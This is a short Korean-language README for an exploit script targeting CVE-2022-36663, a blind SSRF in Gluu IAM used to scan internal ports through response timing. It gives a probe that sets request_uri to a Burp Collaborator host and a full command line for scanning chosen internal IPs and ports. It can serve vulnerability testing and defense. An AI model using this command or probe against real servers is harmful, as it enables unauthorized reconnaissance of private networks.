
Gluu IAM 블라인드 SSRF를 통한 내부 네트워크 스캐너
Gluu IAM 블라인드 SSRF를 통한 내부 네트워크 스캐너
Gluu IAM은 블라인드 SSRF에 취약하며, 이를 악용하면 응답 시간에 따라 내부 네트워크의 열린 포트를 스캔할 수 있습니다.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
대상이 취약한지 확인하려면 /oxauth/restv1/authorize 요청에 &request_uri=http://burpcollab을 추가하고 대상 서버에서 들어오는 트래픽을 폴링하세요.
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url - Gluu IAM 서버 URL
IP - 스캔하려는 내부 IP 주소 또는 서브넷
Port - 스캔하려는 내부 포트
AR - 빈 request_uri로 끝나는 인증 요청 URL
